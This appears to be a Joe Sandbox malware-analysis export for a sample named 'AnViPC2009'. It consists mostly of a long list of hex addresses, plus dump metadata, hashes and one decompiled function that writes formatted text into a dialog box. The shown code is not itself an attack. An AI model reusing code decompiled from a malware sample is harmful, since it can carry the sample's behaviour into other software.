                                                                                                                                                  0x00403c20
                                                                                                                                                  0x00403c10
                                                                                                                                                  0x00403c3d
                                                                                                                                                  0x00403c44
                                                                                                                                                  0x00403c49
                                                                                                                                                  0x00403c4b
                                                                                                                                                  0x00403b10
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403b10
                                                                                                                                                  0x00403c56
                                                                                                                                                  0x00403c5d
                                                                                                                                                  0x00403cb0
                                                                                                                                                  0x00403cb5
                                                                                                                                                  0x00403cb7
                                                                                                                                                  0x00403cc6
                                                                                                                                                  0x00403cc8
                                                                                                                                                  0x00403cd7
                                                                                                                                                  0x00403cdd
                                                                                                                                                  0x00403cf6
                                                                                                                                                  0x00403d00
                                                                                                                                                  0x00403d02
                                                                                                                                                  0x00403d07
                                                                                                                                                  0x00403d0b
                                                                                                                                                  0x00403d0f
                                                                                                                                                  0x00403d13
                                                                                                                                                  0x00403d17
                                                                                                                                                  0x00403d2a
                                                                                                                                                  0x00403d2a
                                                                                                                                                  0x00403d2e
                                                                                                                                                  0x00403d37
                                                                                                                                                  0x00403d3f
                                                                                                                                                  0x00403d4e
                                                                                                                                                  0x00403d53
                                                                                                                                                  0x00403d55
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403d5b
                                                                                                                                                  0x00403d62
                                                                                                                                                  0x00403db1
                                                                                                                                                  0x00403dbf
                                                                                                                                                  0x00403dc2
                                                                                                                                                  0x00403dc7
                                                                                                                                                  0x00403dce
                                                                                                                                                  0x00403e02
                                                                                                                                                  0x00403e02
                                                                                                                                                  0x00403deb
                                                                                                                                                  0x00403deb
                                                                                                                                                  0x00403def
                                                                                                                                                  0x00403e08
                                                                                                                                                  0x00403e0f
                                                                                                                                                  0x00403e14
                                                                                                                                                  0x00403e18
                                                                                                                                                  0x00403e24
                                                                                                                                                  0x00403e29
                                                                                                                                                  0x00403e2d
                                                                                                                                                  0x00403e30
                                                                                                                                                  0x00403e32
                                                                                                                                                  0x00403e39
                                                                                                                                                  0x00403e43
                                                                                                                                                  0x00403e48
                                                                                                                                                  0x00403e4a
                                                                                                                                                  0x00403e51
                                                                                                                                                  0x00403e53
                                                                                                                                                  0x00403e55
                                                                                                                                                  0x00403e55
                                                                                                                                                  0x00403e53
                                                                                                                                                  0x00403e4a
                                                                                                                                                  0x00403e39
                                                                                                                                                  0x00403e5c
                                                                                                                                                  0x00403e60
                                                                                                                                                  0x00403f05
                                                                                                                                                  0x00403f07
                                                                                                                                                  0x00403f0e
                                                                                                                                                  0x00403f0e
                                                                                                                                                  0x00403f12
                                                                                                                                                  0x00403f21
                                                                                                                                                  0x00403f21
                                                                                                                                                  0x00403f25
                                                                                                                                                  0x00403f25
                                                                                                                                                  0x00403f2c
                                                                                                                                                  0x00403f37
                                                                                                                                                  0x00403f37
                                                                                                                                                  0x00403f3b
                                                                                                                                                  0x00403f43
                                                                                                                                                  0x00403f49
                                                                                                                                                  0x00403f4e
                                                                                                                                                  0x00403f62
                                                                                                                                                  0x00403f64
                                                                                                                                                  0x00403f95
                                                                                                                                                  0x00403f9c
                                                                                                                                                  0x00403f9c
                                                                                                                                                  0x00403fa2
                                                                                                                                                  0x00403fa2
                                                                                                                                                  0x00403fa9
                                                                                                                                                  0x00403fab
                                                                                                                                                  0x00403fb2
                                                                                                                                                  0x00403fbb
                                                                                                                                                  0x00403fc0
                                                                                                                                                  0x00403fc0
                                                                                                                                                  0x00403fb2
                                                                                                                                                  0x00403fc4
                                                                                                                                                  0x00403fca
                                                                                                                                                  0x00403fcc
                                                                                                                                                  0x00403fce
                                                                                                                                                  0x00403fd0
                                                                                                                                                  0x00403fd2
                                                                                                                                                  0x00403fd9
                                                                                                                                                  0x00403fee
                                                                                                                                                  0x00403ff3
                                                                                                                                                  0x00403ffd
                                                                                                                                                  0x00404001
                                                                                                                                                  0x00404001
                                                                                                                                                  0x00403fd9
                                                                                                                                                  0x00403fd0
                                                                                                                                                  0x00404006
                                                                                                                                                  0x0040400c
                                                                                                                                                  0x00404011
                                                                                                                                                  0x00404017
                                                                                                                                                  0x0040401c
                                                                                                                                                  0x0040401e
                                                                                                                                                  0x0040431d
                                                                                                                                                  0x0040431d
                                                                                                                                                  0x00404321
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404024
                                                                                                                                                  0x00404024
                                                                                                                                                  0x00404026
                                                                                                                                                  0x0040402b
                                                                                                                                                  0x0040402d
                                                                                                                                                  0x004041ee
                                                                                                                                                  0x004041f4
                                                                                                                                                  0x004041f6
                                                                                                                                                  0x004041f8
                                                                                                                                                  0x004041fc
                                                                                                                                                  0x004041fe
                                                                                                                                                  0x004041fe
                                                                                                                                                  0x004041fc
                                                                                                                                                  0x00404202
                                                                                                                                                  0x00404206
                                                                                                                                                  0x00404212
                                                                                                                                                  0x00404212
                                                                                                                                                  0x00404216
                                                                                                                                                  0x00404323
                                                                                                                                                  0x00404323
                                                                                                                                                  0x0040432a
                                                                                                                                                  0x0040435c
                                                                                                                                                  0x00404360
                                                                                                                                                  0x0040471c
                                                                                                                                                  0x00404722
                                                                                                                                                  0x00404727
                                                                                                                                                  0x0040472b
                                                                                                                                                  0x0040472d
                                                                                                                                                  0x0040472d
                                                                                                                                                  0x0040472d
                                                                                                                                                  0x0040472d
                                                                                                                                                  0x00404733
                                                                                                                                                  0x00404733
                                                                                                                                                  0x0040473a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040473c
                                                                                                                                                  0x00404740
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404742
                                                                                                                                                  0x00404746
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040474c
                                                                                                                                                  0x00404753
                                                                                                                                                  0x00403b09
                                                                                                                                                  0x00403b0b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403b0b
                                                                                                                                                  0x00404759
                                                                                                                                                  0x0040475d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040475d
                                                                                                                                                  0x00404366
                                                                                                                                                  0x00404366
                                                                                                                                                  0x0040436a
                                                                                                                                                  0x0040436c
                                                                                                                                                  0x00404370
                                                                                                                                                  0x00404372
                                                                                                                                                  0x00404376
                                                                                                                                                  0x0040437e
                                                                                                                                                  0x00404383
                                                                                                                                                  0x00404385
                                                                                                                                                  0x00404399
                                                                                                                                                  0x0040439e
                                                                                                                                                  0x004043ad
                                                                                                                                                  0x004043ad
                                                                                                                                                  0x00404385
                                                                                                                                                  0x00404376
                                                                                                                                                  0x004043b2
                                                                                                                                                  0x004043b2
                                                                                                                                                  0x004043b2
                                                                                                                                                  0x004043b2
                                                                                                                                                  0x004043b8
                                                                                                                                                  0x004043b8
                                                                                                                                                  0x004043be
                                                                                                                                                  0x004043c2
                                                                                                                                                  0x004043c8
                                                                                                                                                  0x004043ce
                                                                                                                                                  0x004043d4
                                                                                                                                                  0x004043da
                                                                                                                                                  0x004043e3
                                                                                                                                                  0x004043eb
                                                                                                                                                  0x004043f1
                                                                                                                                                  0x004043f8
                                                                                                                                                  0x004043fa
                                                                                                                                                  0x004043fc
                                                                                                                                                  0x004043fc
                                                                                                                                                  0x00404403
                                                                                                                                                  0x0040440a
                                                                                                                                                  0x0040441c
                                                                                                                                                  0x00404434
                                                                                                                                                  0x0040443f
                                                                                                                                                  0x00404448
                                                                                                                                                  0x00404456
                                                                                                                                                  0x0040445b
                                                                                                                                                  0x00404461
                                                                                                                                                  0x00404464
                                                                                                                                                  0x00404467
                                                                                                                                                  0x00404469
                                                                                                                                                  0x004044dc
                                                                                                                                                  0x004044e6
                                                                                                                                                  0x004044ed
                                                                                                                                                  0x004044f3
                                                                                                                                                  0x004044ff
                                                                                                                                                  0x004044ff
                                                                                                                                                  0x00404503
                                                                                                                                                  0x00404503
                                                                                                                                                  0x0040450c
                                                                                                                                                  0x0040450d
                                                                                                                                                  0x00404513
                                                                                                                                                  0x00404514
                                                                                                                                                  0x00404515
                                                                                                                                                  0x0040451a
                                                                                                                                                  0x0040451c
                                                                                                                                                  0x00404529
                                                                                                                                                  0x00404530
                                                                                                                                                  0x00404532
                                                                                                                                                  0x00404539
                                                                                                                                                  0x00404552
                                                                                                                                                  0x0040455e
                                                                                                                                                  0x0040456a
                                                                                                                                                  0x00404570
                                                                                                                                                  0x00404586
                                                                                                                                                  0x00404594
                                                                                                                                                  0x0040453b
                                                                                                                                                  0x0040454b
                                                                                                                                                  0x0040454b
                                                                                                                                                  0x00404539
                                                                                                                                                  0x0040451e
                                                                                                                                                  0x00404521
                                                                                                                                                  0x00404521
                                                                                                                                                  0x00404599
                                                                                                                                                  0x0040459d
                                                                                                                                                  0x004045a1
                                                                                                                                                  0x004045a1
                                                                                                                                                  0x004045a6
                                                                                                                                                  0x004045aa
                                                                                                                                                  0x004045ae
                                                                                                                                                  0x00404619
                                                                                                                                                  0x00404619
                                                                                                                                                  0x0040461d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404623
                                                                                                                                                  0x00404627
                                                                                                                                                  0x00404633
                                                                                                                                                  0x00404633
                                                                                                                                                  0x00404639
                                                                                                                                                  0x0040463e
                                                                                                                                                  0x00404640
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404646
                                                                                                                                                  0x0040464c
                                                                                                                                                  0x0040464e
                                                                                                                                                  0x0040464e
                                                                                                                                                  0x0040464e
                                                                                                                                                  0x0040464e
                                                                                                                                                  0x00404655
                                                                                                                                                  0x00404659
                                                                                                                                                  0x00404673
                                                                                                                                                  0x0040467b
                                                                                                                                                  0x0040468d
                                                                                                                                                  0x004046a7
                                                                                                                                                  0x004046b2
                                                                                                                                                  0x004046bd
                                                                                                                                                  0x004046ca
                                                                                                                                                  0x004046dd
                                                                                                                                                  0x004046ee
                                                                                                                                                  0x004046f3
                                                                                                                                                  0x004046fa
                                                                                                                                                  0x00404710
                                                                                                                                                  0x00404710
                                                                                                                                                  0x00404715
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040465b
                                                                                                                                                  0x0040465b
                                                                                                                                                  0x00404662
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040466e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040466e
                                                                                                                                                  0x00404659
                                                                                                                                                  0x00404629
                                                                                                                                                  0x0040462d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004045b0
                                                                                                                                                  0x004045b0
                                                                                                                                                  0x004045b6
                                                                                                                                                  0x004045b8
                                                                                                                                                  0x004045cc
                                                                                                                                                  0x004045d4
                                                                                                                                                  0x004045da
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004045dc
                                                                                                                                                  0x004045dc
                                                                                                                                                  0x004045e9
                                                                                                                                                  0x004045ea
                                                                                                                                                  0x004045f0
                                                                                                                                                  0x004045ec
                                                                                                                                                  0x004045ec
                                                                                                                                                  0x004045ec
                                                                                                                                                  0x004045f2
                                                                                                                                                  0x004045fb
                                                                                                                                                  0x004045fc
                                                                                                                                                  0x0040460b
                                                                                                                                                  0x00404614
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404614
                                                                                                                                                  0x004045c0
                                                                                                                                                  0x004045c6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004045c8
                                                                                                                                                  0x004045ca
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004045ca
                                                                                                                                                  0x004045ae
                                                                                                                                                  0x004044f5
                                                                                                                                                  0x004044f9
                                                                                                                                                  0x004044fd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040446b
                                                                                                                                                  0x0040446b
                                                                                                                                                  0x00404471
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404473
                                                                                                                                                  0x0040447f
                                                                                                                                                  0x00404489
                                                                                                                                                  0x0040448c
                                                                                                                                                  0x0040448e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404490
                                                                                                                                                  0x0040449a
                                                                                                                                                  0x0040449a
                                                                                                                                                  0x0040449c
                                                                                                                                                  0x004044c5
                                                                                                                                                  0x004044d7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004044d7
                                                                                                                                                  0x0040449e
                                                                                                                                                  0x004044ac
                                                                                                                                                  0x004044ae
                                                                                                                                                  0x004044b3
                                                                                                                                                  0x004044b9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004044bb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004044bd
                                                                                                                                                  0x004044c3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004044c3
                                                                                                                                                  0x004044a0
                                                                                                                                                  0x004044aa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004044aa
                                                                                                                                                  0x00404492
                                                                                                                                                  0x00404498
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404498
                                                                                                                                                  0x00404469
                                                                                                                                                  0x0040432c
                                                                                                                                                  0x0040432e
                                                                                                                                                  0x00404330
                                                                                                                                                  0x00404340
                                                                                                                                                  0x00404344
                                                                                                                                                  0x00404348
                                                                                                                                                  0x0040434c
                                                                                                                                                  0x00404351
                                                                                                                                                  0x00404353
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404355
                                                                                                                                                  0x004041cc
                                                                                                                                                  0x004041d2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004041d7
                                                                                                                                                  0x0040421c
                                                                                                                                                  0x0040421e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040424e
                                                                                                                                                  0x00404253
                                                                                                                                                  0x00404255
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040425b
                                                                                                                                                  0x0040425e
                                                                                                                                                  0x00404261
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404273
                                                                                                                                                  0x0040427a
                                                                                                                                                  0x0040427f
                                                                                                                                                  0x00404287
                                                                                                                                                  0x0040428c
                                                                                                                                                  0x0040428e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040429e
                                                                                                                                                  0x004042a2
                                                                                                                                                  0x004042a3
                                                                                                                                                  0x004042b9
                                                                                                                                                  0x004042c3
                                                                                                                                                  0x004042cf
                                                                                                                                                  0x004042fd
                                                                                                                                                  0x00404302
                                                                                                                                                  0x00404304
                                                                                                                                                  0x00404313
                                                                                                                                                  0x00404318
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404318
                                                                                                                                                  0x00404306
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404208
                                                                                                                                                  0x00404208
                                                                                                                                                  0x0040420c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040420c
                                                                                                                                                  0x00404206
                                                                                                                                                  0x00404033
                                                                                                                                                  0x00404037
                                                                                                                                                  0x004041de
                                                                                                                                                  0x004041e4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004041e4
                                                                                                                                                  0x0040403d
                                                                                                                                                  0x00404041
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404047
                                                                                                                                                  0x0040404b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404051
                                                                                                                                                  0x00404058
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040405e
                                                                                                                                                  0x00404062
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404068
                                                                                                                                                  0x0040406e
                                                                                                                                                  0x00404075
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040407b
                                                                                                                                                  0x0040409a
                                                                                                                                                  0x0040409c
                                                                                                                                                  0x00404147
                                                                                                                                                  0x00404147
                                                                                                                                                  0x0040417d
                                                                                                                                                  0x0040417d
                                                                                                                                                  0x00404184
                                                                                                                                                  0x0040418e
                                                                                                                                                  0x004041a1
                                                                                                                                                  0x004041ba
                                                                                                                                                  0x004041bc
                                                                                                                                                  0x004041c5
                                                                                                                                                  0x004041c5
                                                                                                                                                  0x004041ca
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004041ca
                                                                                                                                                  0x004040a8
                                                                                                                                                  0x004040ad
                                                                                                                                                  0x004040b0
                                                                                                                                                  0x004040b2
                                                                                                                                                  0x004040c0
                                                                                                                                                  0x004040c5
                                                                                                                                                  0x004040c7
                                                                                                                                                  0x004040ee
                                                                                                                                                  0x004040f3
                                                                                                                                                  0x004040f3
                                                                                                                                                  0x004040c7
                                                                                                                                                  0x004040ff
                                                                                                                                                  0x00404104
                                                                                                                                                  0x0040411e
                                                                                                                                                  0x00404123
                                                                                                                                                  0x00404125
                                                                                                                                                  0x00404127
                                                                                                                                                  0x0040412b
                                                                                                                                                  0x0040416c
                                                                                                                                                  0x00404178
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404178
                                                                                                                                                  0x0040412d
                                                                                                                                                  0x00404134
                                                                                                                                                  0x00404142
                                                                                                                                                  0x00404142
                                                                                                                                                  0x00404134
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404125
                                                                                                                                                  0x0040401e
                                                                                                                                                  0x00403f9e
                                                                                                                                                  0x00403f9e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403f9e
                                                                                                                                                  0x00403f73
                                                                                                                                                  0x00403f78
                                                                                                                                                  0x00403f7a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403f7c
                                                                                                                                                  0x00403f83
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403f91
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403f91
                                                                                                                                                  0x00403f3d
                                                                                                                                                  0x00403f41
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403f41
                                                                                                                                                  0x00403f2e
                                                                                                                                                  0x00403f35
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403f35
                                                                                                                                                  0x00403f14
                                                                                                                                                  0x00403f1b
                                                                                                                                                  0x00403f1f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403f1f
                                                                                                                                                  0x00403e66
                                                                                                                                                  0x00403e6c
                                                                                                                                                  0x00403e70
                                                                                                                                                  0x00403e94
                                                                                                                                                  0x00403e72
                                                                                                                                                  0x00403e7a
                                                                                                                                                  0x00403e7a
                                                                                                                                                  0x00403e99
                                                                                                                                                  0x00403e9d
                                                                                                                                                  0x00403e9f
                                                                                                                                                  0x00403ea1
                                                                                                                                                  0x00403ea1
                                                                                                                                                  0x00403ea8
                                                                                                                                                  0x00403eac
                                                                                                                                                  0x00403ebf
                                                                                                                                                  0x00403ec6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403eae
                                                                                                                                                  0x00403eae
                                                                                                                                                  0x00403eb5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403eb7
                                                                                                                                                  0x00403ecb
                                                                                                                                                  0x00403ed3
                                                                                                                                                  0x00403ed8
                                                                                                                                                  0x00403edc
                                                                                                                                                  0x00403ede
                                                                                                                                                  0x00403ee6
                                                                                                                                                  0x00403ef0
                                                                                                                                                  0x00403ef5
                                                                                                                                                  0x00403ef7
                                                                                                                                                  0x00403efb
                                                                                                                                                  0x00403efc
                                                                                                                                                  0x00403efc
                                                                                                                                                  0x00403ef7
                                                                                                                                                  0x00403ee6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403edc
                                                                                                                                                  0x00403eac
                                                                                                                                                  0x00403df1
                                                                                                                                                  0x00403df8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403dfa
                                                                                                                                                  0x00403dfa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403dfa
                                                                                                                                                  0x00403df8
                                                                                                                                                  0x00403dd0
                                                                                                                                                  0x00403dd4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403dd8
                                                                                                                                                  0x00403ddd
                                                                                                                                                  0x00403ddf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403de1
                                                                                                                                                  0x00403de4
                                                                                                                                                  0x00403de8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403de8
                                                                                                                                                  0x00403ddf
                                                                                                                                                  0x00403d64
                                                                                                                                                  0x00403d6a
                                                                                                                                                  0x00403d6d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403d7e
                                                                                                                                                  0x00403d83
                                                                                                                                                  0x00403d85
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403d87
                                                                                                                                                  0x00403d87
                                                                                                                                                  0x00403d89
                                                                                                                                                  0x00403d9e
                                                                                                                                                  0x00403da5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403da5
                                                                                                                                                  0x00403d85
                                                                                                                                                  0x00403d19
                                                                                                                                                  0x00403d1f
                                                                                                                                                  0x00403d22
                                                                                                                                                  0x00403d24
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403d24
                                                                                                                                                  0x00403cb9
                                                                                                                                                  0x00403cc0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403cc2
                                                                                                                                                  0x00403cc2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403cc2
                                                                                                                                                  0x00403c5f
                                                                                                                                                  0x00403c65
                                                                                                                                                  0x00403c68
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403c6a
                                                                                                                                                  0x00403c6e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403c70
                                                                                                                                                  0x00403c70
                                                                                                                                                  0x00403c72
                                                                                                                                                  0x00403c74
                                                                                                                                                  0x00403c74
                                                                                                                                                  0x00403c87
                                                                                                                                                  0x00403c93
                                                                                                                                                  0x00403c95
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403c97
                                                                                                                                                  0x00403ca7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403ca7
                                                                                                                                                  0x00403c95
                                                                                                                                                  0x00403c6e
                                                                                                                                                  0x00403bb9
                                                                                                                                                  0x00403bbe
                                                                                                                                                  0x00403bc2
                                                                                                                                                  0x00403bc4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403bc4
                                                                                                                                                  0x00403b34
                                                                                                                                                  0x00403b40
                                                                                                                                                  0x00403b43
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403b45
                                                                                                                                                  0x00403b4c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403b4c
                                                                                                                                                  0x00403a66
                                                                                                                                                  0x00403a69
                                                                                                                                                  0x00403a70
                                                                                                                                                  0x00403a70
                                                                                                                                                  0x00403a77
                                                                                                                                                  0x00403a77
                                                                                                                                                  0x00403a7a
                                                                                                                                                  0x00403ac2
                                                                                                                                                  0x00403ac2
                                                                                                                                                  0x00403ac5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403ac7
                                                                                                                                                  0x00403ace
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403ade
                                                                                                                                                  0x00403ae3
                                                                                                                                                  0x00403ae5
                                                                                                                                                  0x00403a3c
                                                                                                                                                  0x00403a43
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403aeb
                                                                                                                                                  0x00403aed
                                                                                                                                                  0x00403b02
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403b02
                                                                                                                                                  0x00403a7c
                                                                                                                                                  0x00403a88
                                                                                                                                                  0x00403a8d
                                                                                                                                                  0x00403a8f
                                                                                                                                                  0x00403a91
                                                                                                                                                  0x00403a91
                                                                                                                                                  0x00403a98
                                                                                                                                                  0x00403a9f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403aa1
                                                                                                                                                  0x00403aac
                                                                                                                                                  0x00403aae
                                                                                                                                                  0x00403aba
                                                                                                                                                  0x00403abf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403abf
                                                                                                                                                  0x00403a9f
                                                                                                                                                  0x00403a7a
                                                                                                                                                  0x00403a6b
                                                                                                                                                  0x00403a6e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403a6e
                                                                                                                                                  0x00403a23
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403a3a
                                                                                                                                                  0x00403a4d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403a4d
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Char
                                                                                                                                                  • String ID: E$|LA$|LA$|LA$|LA$|LA$|LA$|LA$|LA$|LA$|LA
                                                                                                                                                  • API String ID: 751630497-346517416
                                                                                                                                                  • Opcode ID: 8cb7388664107b7cc6029eb6e34bce1cec4cf77fa07ba7c5c11d85c5f09dc011
                                                                                                                                                  • Instruction ID: 31783cc8de0c73cb0cc9da6340988402d3ab0ea6621f7e6004e8fcb766bb391b
                                                                                                                                                  • Opcode Fuzzy Hash: 8cb7388664107b7cc6029eb6e34bce1cec4cf77fa07ba7c5c11d85c5f09dc011
                                                                                                                                                  • Instruction Fuzzy Hash: 9E8237B0904685ADDF25DF70C844BEB7BA8AF41309F0441BBEA99761C2C77C6B84CB59
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040AD1F(char _a4, long _a8) {
                                                                                                                                                  				struct HWND__* _v8;
                                                                                                                                                  				char _v43;
                                                                                                                                                  				intOrPtr _v48;
                                                                                                                                                  				signed int _v60;
                                                                                                                                                  				int _v64;
                                                                                                                                                  				void* _v68;
                                                                                                                                                  				intOrPtr _t48;
                                                                                                                                                  				struct HWND__* _t49;
                                                                                                                                                  
                                                                                                                                                  				_t49 = GetDlgItem( *0x419f80, 0x67);
                                                                                                                                                  				_v8 = _t49;
                                                                                                                                                  				if( *0x41a814 == 0) {
                                                                                                                                                  					_t48 =  *0x418ecc; // 0x0
                                                                                                                                                  					E0040645E(_t48);
                                                                                                                                                  					ShowWindow(_t49, 5); // executed
                                                                                                                                                  					SendMessageA(_t49, 0xb1, 0, 0xffffffff);
                                                                                                                                                  					SendMessageA(_t49, 0xc2, 0, 0x4125aa);
                                                                                                                                                  					 *0x41a814 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				SendMessageA(_v8, 0xb1, 0x5f5e100, 0x5f5e100);
                                                                                                                                                  				_v68 = 0x3c;
                                                                                                                                                  				SendMessageA(_v8, 0x43a, 0,  &_v68);
                                                                                                                                                  				_v43 = 0;
                                                                                                                                                  				_v64 = 1;
                                                                                                                                                  				if(_a4 != 0) {
                                                                                                                                                  					_v60 = _v60 & 0xbfffffff | 1;
                                                                                                                                                  					_v48 = 0xa0;
                                                                                                                                                  					_v64 = 0x40000001;
                                                                                                                                                  				}
                                                                                                                                                  				SendMessageA(_v8, 0x444, 1,  &_v68);
                                                                                                                                                  				SendMessageA(_v8, 0xc2, 0, _a8);
                                                                                                                                                  				SendMessageA(_v8, 0xb1, 0x5f5e100, 0x5f5e100);
                                                                                                                                                  				if(_a4 != 0) {
                                                                                                                                                  					_v60 = _v60 & 0xfffffffe | 0x40000000;
                                                                                                                                                  					SendMessageA(_v8, 0x444, 1,  &_v68);
                                                                                                                                                  				}
